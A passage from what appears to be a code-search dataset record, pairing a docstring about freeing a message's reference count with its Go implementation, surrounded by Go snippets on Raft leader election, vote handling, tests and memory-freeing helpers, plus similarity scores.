[]byte(msg))\n\n\t\tentry := raftpb.Entry{\n\t\t\tTerm: lastTerm,\n\t\t\tIndex: lastIndex + uint64(i+1),\n\t\t\tType: raftpb.EntryNormal,\n\t\t\tData: b,\n\t\t}\n\t\twrongEntries = append(wrongEntries, entry)\n\n\t}\n\traftGroupNodes[2].storage.StoreEntries(wrongEntries)\n\tfmt.Printf(\"save wrong message success, begin index: %d, term: %d\\n\", wrongEntries[0].Index, wrongEntries[0].Term)\n\twrongIndex, err := raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"save wrong message to node[2], last index :%d\", wrongIndex)\n\n\traftGroupNodes[2].Stop()\n\n\t// restart\n\traftGroupNodes[0].Start()\n\traftGroupNodes[1].Start()\n\n\t// wait a new leader\n\ttime.Sleep(5 * time.Second)\n\tleaderNode = testGetLeaderNode(t, raftGroupNodes)\n\tleaderLastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tleaderLastTerm, err := leaderNode.storage.Term(leaderLastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\tfmt.Printf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\n\t// start the last one node\n\traftGroupNodes[2].Start()\n\t// wait leader append entries\n\ttime.Sleep(5 * time.Second)\n\n\t// check the raft log of last node will be replicated by new leader\n\tlastIndex, err = raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tlastTerm, err = raftGroupNodes[2].storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\tfmt.Printf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\n\tif lastIndex != leaderLastIndex {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node index:%d, but the leader:%d\", lastIndex, leaderLastIndex)\n\t}\n\n\tif lastTerm != leaderLastTerm {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node term :%d, but the leader:%d\", lastTerm, leaderLastTerm)\n\t}\n\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\tDPrintf(\"[reject] %v currentTerm:%v vote reject for:%v term:%v\",rf.me,rf.currentTerm,args.CandidateId,args.Term)\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm {\n\t\trf.state = FOLLOWER\n\t\trf.votedFor = -1\n\t\trf.currentTerm = args.Term\n\t}\n\n\treply.Term = rf.currentTerm\n\n\tlastLogTerm := rf.getLastLogTerm()\n\tlastLogIndex := rf.getLastLogIndex()\n\n\tlogFlag := false\n\tif (args.LastLogTerm > lastLogTerm) || (args.LastLogTerm == lastLogTerm && args.LastLogIndex >= lastLogIndex) {\n\t\tlogFlag = true\n\t}\n\n\tif (-1 == rf.votedFor || args.CandidateId == rf.votedFor) && logFlag {\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CandidateId\n\t\trf.voteChan <- true\n\t\trf.state = FOLLOWER\n\t}\n\t//DPrintf(\"[RequestVote]: server %v send %v\", rf.me, args.CandidateId)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.lock()\n\tdefer rf.unLock()\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tif args.Term < rf.currentTerm {\n\t\treturn\n\t} else if args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\trf.myState = FollowerState\n\t\trf.persist()\n\t}\n\n\tif rf.votedFor < 0 || rf.votedFor == args.CandidateId {\n\t\t// candidate's logEntries is at least as up-to-date as receiver's logEntries, grant vote\n\t\tlastLogTerm := -1\n\t\tif len(rf.logEntries) != 0 {\n\t\t\tlastLogTerm = rf.logEntries[len(rf.logEntries)-1].Term\n\t\t} else {\n\t\t\tlastLogTerm = rf.lastIncludedTerm\n\t\t}\n\t\tif args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < rf.lastIncludedIndex+len(rf.logEntries)) {\n\t\t\treturn\n\t\t} else {\n\t\t\trf.votedFor = args.CandidateId\n\t\t\treply.VoteGranted = true\n\t\t\trf.timerReset = time.Now()\n\t\t\trf.persist()\n\t\t\treturn\n\t\t}\n\t}\n\t// Your code here (2A, 2B).\n}", "func (r *Raft) candidate() int {\n\t//myId := r.Myconfig.Id\n\t//fmt.Println(\"Election started!I am\", myId)\n\n\t//reset the votes else it will reflect the votes received in last term\n\tr.resetVotes()\n\n\t//--start election timer for election-time out time, so when responses stop coming it must restart the election\n\n\twaitTime := 10\n\t//fmt.Println(\"ELection timeout is\", waitTime)\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\tr.currentTerm = r.currentTerm + 1 //increment current term\n\t\t//fmt.Println(\"I am candidate\", r.Myconfig.Id, \"and current term is now:\", r.currentTerm)\n\n\t\tr.votedFor = r.Myconfig.Id //vote for self\n\t\tr.WriteCVToDisk() //write Current term and votedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].vote = true\n\n\t\t//fmt.Println(\"before calling prepRV\")\n\t\treqVoteObj := r.prepRequestVote() //prepare request vote obj\n\t\t//fmt.Println(\"after calling prepRV\")\n\t\tr.sendToAll(reqVoteObj) //send requests for vote to all servers\n\t\t//this loop for reading responses from all servers\n\t\tfor {\n\t\t\treq := r.receive()\n\t\t\tswitch req.(type) {\n\t\t\tcase RequestVoteResponse: //got the vote response\n\t\t\t\tresponse := req.(RequestVoteResponse) //explicit typecasting so that fields of struct can be used\n\t\t\t\t//fmt.Println(\"Got the vote\", response.voteGranted)\n\t\t\t\tif response.voteGranted {\n\t\t\t\t\t//\t\t\t\t\ttemp := r.f_specific[response.id] //NOT ABLE TO DO THIS--WHY??--WORK THIS WAY\n\t\t\t\t\t//\t\t\t\t\ttemp.vote = true\n\n\t\t\t\t\tr.f_specific[response.id].vote = true\n\t\t\t\t\t//r.voteCount = r.voteCount + 1\n\t\t\t\t}\n\t\t\t\tvoteCount := r.countVotes()\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Votecount is\", voteCount)\n\t\t\t\tif voteCount >= majority {\n\t\t\t\t\t//fmt.Println(\"Votecount is majority, I am new leader\", r.Myconfig.Id)\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\t//Can be clubbed with serviceAppendEntriesReq with few additions!--SEE LATER\n\n\t\t\t\t//fmt.Println(\"I am \", r.Myconfig.Id, \"candidate,got AE_Req from\", request.leaderId, \"terms my,leader are\", r.currentTerm, request.term)\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tappEntriesResponse := AppendEntriesResponse{}\n\t\t\t\tappEntriesResponse.followerId = r.Myconfig.Id\n\t\t\t\tappEntriesResponse.success = false //false by default, in case of heartbeat or invalid leader\n\t\t\t\tif request.term >= r.currentTerm { //valid leader\n\t\t\t\t\tr.LeaderConfig.Id = request.leaderId //update leader info\n\t\t\t\t\tElectionTimer.Reset(waitTime_secs) //reset the timer\n\t\t\t\t\tvar myLastIndexTerm int\n\t\t\t\t\tif len(r.myLog) == 0 {\n\t\t\t\t\t\tmyLastIndexTerm = -1\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tmyLastIndexTerm = r.myLog[r.myMetaData.lastLogIndex].Term\n\t\t\t\t\t}\n\t\t\t\t\tif request.leaderLastLogIndex == r.myMetaData.lastLogIndex && request.term == myLastIndexTerm { //this is heartbeat from a valid leader\n\t\t\t\t\t\tappEntriesResponse.success = true\n\t\t\t\t\t}\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\t//check if log is same\n\t\t\t\t\t//fmt.Println(\"In candidate, AE_Req-else\")\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t}\n\t\t\tcase int:\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tElectionTimer.Reset(waitTime_secs)\n\t\t\t\tbreak //come out of inner loop i.e. restart the election process\n\t\t\t\t//default: if something else comes, then ideally it should ignore that and again wait for correct type of response on channel\n\t\t\t\t//it does this, in the present code structure\n\t\t\t}\n\t\t}\n\t}\n}", "func (m *MockRepoKeeper) IndexProposalVote(name, propID, voterAddr string, vote int) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"IndexProposalVote\", name, propID, voterAddr, vote)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func TestSelectVoterMaxVarious(t *testing.T) {\n\thash := 0\n\tfor minMaxRate := 1; minMaxRate <= 100000000; minMaxRate *= 10000 {\n\t\tt.Logf(\"<<< min: 100, max: %d >>>\", 100*minMaxRate)\n\t\tfor validators := 16; validators <= 256; validators *= 4 {\n\t\t\tfor voters := 1; voters <= validators; voters += 10 {\n\t\t\t\tvalSet, _ := randValidatorSetWithMinMax(PrivKeyEd25519, validators, 100, 100*int64(minMaxRate))\n\t\t\t\tvoterSet := SelectVoter(valSet, []byte{byte(hash)}, &VoterParams{int32(voters), 20})\n\t\t\t\tif voterSet.Size() < voters {\n\t\t\t\t\tt.Logf(\"Cannot elect voters up to MaxVoters: validators=%d, MaxVoters=%d, actual voters=%d\",\n\t\t\t\t\t\tvalidators, voters, voterSet.Size())\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\thash++\n\t\t\t}\n\t\t}\n\t}\n}", "func (r *Raft) serviceRequestVote(request RequestVote, state int) {\n\t//fmt.Println(\"In service RV method of \", r.Myconfig.Id)\n\tresponse := RequestVoteResponse{}\n\tcandidateId := request.CandidateId\n\tresponse.Id = r.Myconfig.Id\n\tif r.isDeservingCandidate(request) {\n\t\tresponse.VoteGranted = true\n\t\tr.myCV.VotedFor = candidateId\n\t\tr.myCV.CurrentTerm = request.Term\n\t} else {\n\t\tif request.Term > r.myCV.CurrentTerm {\n\t\t\tr.myCV.CurrentTerm = request.Term\n\t\t\tr.myCV.VotedFor = -1\n\t\t}\n\t\tresponse.VoteGranted = false\n\t}\n\tif request.Term > r.myCV.CurrentTerm {\n\t\tr.WriteCVToDisk()\n\t}\n\tresponse.Term = r.myCV.CurrentTerm\n\tr.send(candidateId, response) //send to sender using send(sender,response)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\t/*\n\tIf votedFor is null or candidateId, and candidate’s\n\tlog is at least as up-to-date as receiver’s log, grant vote\n\t */\n\tif rf.isCandidateUpToDate(args) &&\n\t\t(rf.votedFor == -1 || rf.votedFor == args.CandidateId) {\n\t\t// grant vote and update rf's term.\n\t\trf.currentTerm = args.Term\n\n\t\treply.Term = args.Term\n\n\t\treply.VoteGranted = true\n\t} else {\n\t\t// don't grant vote to the candidate.\n\t\treply.Term = rf.currentTerm\n\n\t\treply.VoteGranted = false\n\t}\n\n}", "func TestCreateVotingCommittee(t *testing.T) {\n\t// Set up a committee set with a stakes map\n\t_, db := lite.SetupDatabase()\n\tp, _, err := user.NewProvisioners(db)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tvar totalWeight uint64\n\tfor i := 0; i < 50; i++ {\n\t\tkeys, _ := user.NewRandKeys()\n\t\tif err := p.AddMember(keys.EdPubKeyBytes, keys.BLSPubKeyBytes, 500, 0, 1000); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\ttotalWeight += 500\n\t}\n\n\t// Run sortition to get 50 members (as a Set, committee cannot contain any duplicate)\n\tcommittee := p.CreateVotingCommittee(100, totalWeight, 1, 50)\n\n\t// total amount of members in the committee should be 50\n\tassert.Equal(t, 50, committee.Size())\n}", "func (_Contracts *ContractsFilterer) FilterNewVoter(opts *bind.FilterOpts, _voter []common.Address) (*ContractsNewVoterIterator, error) {\n\n\tvar _voterRule []interface{}\n\tfor _, _voterItem := range _voter {\n\t\t_voterRule = append(_voterRule, _voterItem)\n\t}\n\n\tlogs, sub, err := _Contracts.contract.FilterLogs(opts, \"NewVoter\", _voterRule)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &ContractsNewVoterIterator{contract: _Contracts.contract, event: \"NewVoter\", logs: logs, sub: sub}, nil\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\n\trf.mu.Lock()\n\trf.debug(\"***************Inside the RPC handler for sendRequestVote *********************\")\n\tdefer rf.mu.Unlock()\n\tvar lastIndex int\n\t//var lastTerm int\n\tif len(rf.log) > 0 {\n\t\tlastLogEntry := rf.log[len(rf.log)-1]\n\t\tlastIndex = lastLogEntry.LastLogIndex\n\t\t//lastTerm = lastLogEntry.lastLogTerm\n\t}else{\n\t\tlastIndex = 0\n\t\t//lastTerm = 0\n\t}\n\treply.Term = rf.currentTerm\n\t//rf.debug()\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\trf.debug(\"My term is higher than candidate's term, myTerm = %d, candidate's term = %d\", rf.currentTerm,args.Term )\n\t} else if (rf.votedFor == -1 || rf.votedFor == args.CandidateId) && args.LastLogIndex >= lastIndex {\n\t\trf.votedFor = args.CandidateId\n\t\treply.VoteGranted = true\n\t\trf.currentTerm = args.Term\n\t\trf.resetElectionTimer()\n\t\t//rf.debug(\"I am setting my currentTerm to -->\",args.Term,\"I am \",rf.me)\n\t}\n}", "func (_Votes *VotesTransactorSession) VoteCandidate(addrCandidate common.Address) (*types.Transaction, error) {\n\treturn _Votes.Contract.VoteCandidate(&_Votes.TransactOpts, addrCandidate)\n}", "func (_Contracts *ContractsTransactor) InitiateVoting(opts *bind.TransactOpts, _proposal *big.Int) (*types.Transaction, error) {\n\treturn _Contracts.contract.Transact(opts, \"initiateVoting\", _proposal)\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\trf.updateTerm(args.Term)\n\treply.Term = rf.currentTerm\n\tlastLogIndex := rf.lastIncludedIndex + len(rf.log) - 1\n\tlastLogTerm := rf.log[len(rf.log)-1].Term\n\treply.VoteGranted = (rf.votedFor == -1 || rf.votedFor == args.CandidateId) && (lastLogTerm < args.LastLogTerm || lastLogTerm == args.LastLogTerm && lastLogIndex <= args.LastLogIndex)\n\tif reply.VoteGranted {\n\t\trf.votedFor = args.CandidateId\n\t}\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.persist()\n\tdefer rf.mu.Unlock()\n\treply.Term = rf.CurrentTerm\n\n\tif args.Term < rf.CurrentTerm {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif args.Term > rf.CurrentTerm {\n\t\trf.VotedFor = -1\n\t\trf.CurrentTerm = args.Term\n\t\trf.identity = FOLLOWER\n\t}\n\n\tif rf.VotedFor != -1 && rf.VotedFor != args.CandidateId {\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\tvar rfLogIndex int\n\tvar rfLogTerm int\n\tif len(rf.Log) > 0 {\n\t\trfLogIndex = rf.Log[len(rf.Log)-1].Index\n\t\trfLogTerm = rf.Log[len(rf.Log)-1].Term\n\t} else {\n\t\trfLogIndex = rf.lastIncludedIndex\n\t\trfLogTerm = rf.lastIncludedTerm\n\t}\n\n\tif args.LastLogTerm > rfLogTerm || args.LastLogTerm == rfLogTerm && args.LastLogIndex >= rfLogIndex {\n\t\treply.VoteGranted = true\n\t\trf.VotedFor = args.CandidateId\n\t\trf.identity = FOLLOWER\n\t\trf.hasVoted <- true\n\t} else {\n\t\treply.VoteGranted = false\n\t}\n}", "func (node *Node) runElection() {\n\tnode.currentTerm++\n\tcurrentTerm := node.currentTerm\n\tnode.state = candidate\n\tnode.votedFor = node.id\n\tnode.timeSinceTillLastReset = time.Now()\n\n\tlog.Printf(\"Node %d has become a candidate with currentTerm=%d\", node.id, node.currentTerm)\n\n\t// We vote for ourselves.\n\tvar votesReceived int32 = 1\n\n\t// Send votes to all the other machines in the raft group.\n\tfor _, nodeID := range node.participantNodes {\n\t\tgo func(id int) {\n\t\t\tvoteRequestArgs := RequestVoteArgs{\n\t\t\t\tterm: currentTerm,\n\t\t\t\tcandidateID: id,\n\t\t\t}\n\n\t\t\tvar reply RequestVoteReply\n\t\t\tlog.Printf(\"Sending a RequestVote to %d with args %+v\", id, voteRequestArgs)\n\n\t\t\tif err := node.server.Call(id, \"Node.RequestVote\", voteRequestArgs, &reply); err == nil {\n\t\t\t\tlog.Printf(\"Received a response for RequestVote from node %d saying %+v, for the election started by node %d\", id, reply, node.id)\n\n\t\t\t\tnode.mu.Lock()\n\t\t\t\tdefer node.mu.Unlock()\n\n\t\t\t\t// If the state of the current node has changed by the time the election response arrives then we must back off.\n\t\t\t\tif node.state != candidate {\n\t\t\t\t\tlog.Printf(\"The state of node %d has changed from candidate to %s while waiting for an election response\", node.id, node.state)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// If the node responds with a higher term then we must back off from the election.\n\t\t\t\tif reply.term > currentTerm {\n\t\t\t\t\tnode.updateStateToFollower(reply.term)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif reply.term == currentTerm {\n\t\t\t\t\tif reply.voteGranted {\n\t\t\t\t\t\tvotes := int(atomic.AddInt32(&votesReceived, 1))\n\t\t\t\t\t\t// Check for majority votes having been received.\n\t\t\t\t\t\tif votes > (len(node.participantNodes)+1)/2 {\n\t\t\t\t\t\t\tlog.Printf(\"The election has been won by node %d\", node.id)\n\t\t\t\t\t\t\tnode.updateStateToLeader()\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}(nodeID)\n\t}\n}", "func TestPreVoteWithSplitVote(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// simulate leader down. followers start split vote.\n\tnt.isolate(1)\n\tnt.send([]pb.Message{\n\t\t{From: 2, To: 2, Type: pb.MsgHup},\n\t\t{From: 3, To: 3, Type: pb.MsgHup},\n\t}...)\n\n\t// check whether the term values are expected\n\t// n2.Term == 3\n\t// n3.Term == 3\n\tsm := nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\t// check state\n\t// n2 == candidate\n\t// n3 == candidate\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateCandidate)\n\t}\n\n\t// node 2 election timeout first\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// n2.Term == 4\n\t// n3.Term == 4\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 4)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 4 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 4)\n\t}\n\n\t// check state\n\t// n2 == leader\n\t// n3 == follower\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n}" ]
[ "0.64001024", "0.6056834", "0.6027904", "0.5626672", "0.56244373", "0.5542475", "0.5518413", "0.5512789", "0.54705715", "0.54133296", "0.5404219", "0.5358423", "0.5338186", "0.53258735", "0.531703", "0.5274945", "0.5258293", "0.5252841", "0.5242921", "0.5231294", "0.52267873", "0.52237576", "0.52073056", "0.515555", "0.51415116", "0.5130685", "0.5117625", "0.5082143", "0.50585216", "0.50425893", "0.5024086", "0.5018263", "0.5006788", "0.5005853", "0.50007814", "0.498391", "0.4978406", "0.49765745", "0.49553025", "0.49425063", "0.49354294", "0.4931051", "0.49291784", "0.49200508", "0.49151367", "0.48985216", "0.48875064", "0.48823404", "0.4882211", "0.48745978", "0.4865725", "0.4861895", "0.48513582", "0.4840962", "0.4840204", "0.48381984", "0.483613", "0.48345464", "0.4832964", "0.48261443", "0.48256367", "0.4804938", "0.4791348", "0.47752696", "0.47747132", "0.47707722", "0.47665596", "0.47544333", "0.4711517", "0.47042146", "0.47016996", "0.4700983", "0.46964377", "0.46914747", "0.4688856", "0.4688004", "0.46844134", "0.4681902", "0.46766788", "0.4674169", "0.46714807", "0.46691176", "0.46680298", "0.46664086", "0.46534932", "0.46508348", "0.46486616", "0.464622", "0.46409604", "0.46385568", "0.46384612", "0.4633403", "0.4631893", "0.46196583", "0.4617827", "0.46177357", "0.4614184", "0.46115413", "0.4604205", "0.4604201" ]
0.7073056
0
Free decrements the reference count on a message, and releases its resources if no further references remain. While this is not strictly necessary thanks to GC, doing so allows for the resources to be recycled without engaging GC. This can have rather substantial benefits for performance.
func (m *Message) Free() { var ch chan *Message if v := atomic.AddInt32(&m.refcnt, -1); v > 0 { return } for i := range messageCache { if m.bsize == messageCache[i].maxbody { ch = messageCache[i].cache break } } m.Port = nil select { case ch <- m: default: } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (m *Message) Free() {\n\tC.nlmsg_free(m.nlm)\n\tm.nlm = nil\n}", "func (m *Message) Release() {\n\tif m != nil {\n\t\tm.Text = nil\n\t\tfor i := len(m.List) - 1; i >= 0; i-- {\n\t\t\tm.List[i] = nil\n\t\t}\n\t\tm.List = m.List[:0]\n\t\tif m.used > 0 {\n\t\t\tcopy(m.buf[:m.used], blankBuf[:m.used])\n\t\t\tm.used = 0\n\t\t}\n\t\tmessagePool.Put(m)\n\t}\n}", "func (pkt *Packet) Free() {\n\tpkt.mtx.Lock()\n\tif *pkt.refCount <= 0 {\n\t\tpanic(\"reference count underflow\")\n\t}\n\t*pkt.refCount--\n\tif *pkt.refCount == 0 {\n\t\tpkt.reset()\n\t\tpkt.mtx.Unlock()\n\t\tpacketPool.Put(pkt)\n\t} else {\n\t\tpkt.mtx.Unlock()\n\t}\n}", "func (room *RoomMessages) messagesFree() {\n\troom.info.messagesM.Lock()\n\troom.info._messages = nil\n\troom.info.messagesM.Unlock()\n}", "func (conn *Connection) Free() {\n\n\tif conn.done() {\n\t\treturn\n\t}\n\tconn.setDone()\n\n\tconn.wGroup.Wait()\n\n\t// dont delete. conn = nil make pointer nil, but other pointers\n\t// arent nil. If conn.disconnected = true it is mean that all\n\t// resources are cleared, but pointer alive, so we only make pointer = nil\n\tif conn.lobby == nil {\n\t\treturn\n\t}\n\n\tconn.setDisconnected()\n\n\tconn.ws.Close()\n\tclose(conn.send)\n\tclose(conn.actionSem)\n\t// dont delete. conn = nil make pointer nil, but other pointers\n\t// arent nil and we make 'conn.disconnected = true' for them\n\n\tconn.lobby = nil\n\tconn.setRoom(nil)\n\n\t//fmt.Println(\"conn free memory\")\n}", "func (x *FzBuffer) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func Free() {\n\tflags = nil // Any future call to Get() will panic on a nil dereference.\n}", "func (x *FzIcclink) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzCompressedBuffer) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (br *BufReader) Free() {\n\t// decrease the underlying netconn object holding\n\tbr.Reset(nil)\n\tif br.pool != nil {\n\t\tbr.pool.put(br)\n\t}\n}", "func (rx *Rx) Free() error {\n\treturn err(C.go_rd_free((*C.struct_rx_port)(rx)))\n}", "func (acker *acker) Free() {\n\tfor k, _ := range acker.fmap {\n\t\tacker.fmap[k] = nil\n\t}\n\tacker.fmap = nil\n\tacker.mutex = nil\n}", "func (in *InBuffer) free() {\n\tif enableBufferPool {\n\t\tif in.isFreed {\n\t\t\tpanic(\"link.InBuffer: double free\")\n\t\t}\n\t\tin.pool.PutInBuffer(in)\n\t}\n}", "func (b *Buffer) Release() {\n\tif b.mem != nil || b.parent != nil {\n\t\tdebug.Assert(atomic.LoadInt64(&b.refCount) > 0, \"too many releases\")\n\n\t\tif atomic.AddInt64(&b.refCount, -1) == 0 {\n\t\t\tif b.mem != nil {\n\t\t\t\tb.mem.Free(b.buf)\n\t\t\t} else {\n\t\t\t\tb.parent.Release()\n\t\t\t\tb.parent = nil\n\t\t\t}\n\t\t\tb.buf, b.length = nil, 0\n\t\t}\n\t}\n}", "func (x *PDFMailDocEvent) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzStream) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (node *SvmNode) Free() {\n\tC.free(unsafe.Pointer(node.object))\n\tnode.length = 0\n\tnode.object = nil\n}", "func (x *PDFXobject) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *Size) Free() {\n\tif x != nil && x.allocs626288d != nil {\n\t\tx.allocs626288d.(*cgoAllocMap).Free()\n\t\tx.ref626288d = nil\n\t}\n}", "func (x *PDFLexbufLarge) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzCmmInstance) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFPattern) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (t *BeatTracker) Free() {\n\tif t.o == nil {\n\t\treturn\n\t}\n\tC.del_aubio_beattracking(t.o)\n\tt.o = nil\n}", "func (a *ResourceAllocator) Free(b []byte) {\n\tif a == nil {\n\t\tDefaultAllocator.Free(b)\n\t\treturn\n\t}\n\n\tsize := len(b)\n\n\t// Release the memory to the allocator first.\n\talloc := a.allocator()\n\talloc.Free(b)\n\n\t// Release the memory in our accounting.\n\tatomic.AddInt64(&a.bytesAllocated, int64(-size))\n}", "func (m *MIDs) Free(i uint16) {\n\tm.Lock()\n\tm.index[i] = nil\n\tm.Unlock()\n}", "func (c *Collection) Free() (*types.Object, error) {\n\treturn c.Pause()\n}", "func (la *Allocator) Free(lc eal.LCore) {\n\tif la.allocated[lc.ID()] == \"\" {\n\t\tpanic(\"lcore double free\")\n\t}\n\tlogger.Info(\"lcore freed\",\n\t\tlc.ZapField(\"lc\"),\n\t\tzap.String(\"role\", la.allocated[lc.ID()]),\n\t\tla.provider.NumaSocketOf(lc).ZapField(\"socket\"),\n\t)\n\tla.allocated[lc.ID()] = \"\"\n}", "func (x *PDFXrefSubsec) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzCmmEngine) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFGraftMap) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFHmtx) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *PDFDocument) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func (x *FzLink) Free() {\n\tif x != nil {\n\t\tC.free(unsafe.Pointer(x))\n\t}\n}", "func Free(p Pointer) {\n\tallocator.Free(uintptr(p))\n}", "func (out *OutBuffer) free() {\n\tif enableBufferPool {\n\t\tif out.isFreed {\n\t\t\tpanic(\"link.OutBuffer: double free\")\n\t\t}\n\t\tout.pool.PutOutBuffer(out)\n\t}\n}", "func (x *PDFProcessor) Free() {\n\tif x != 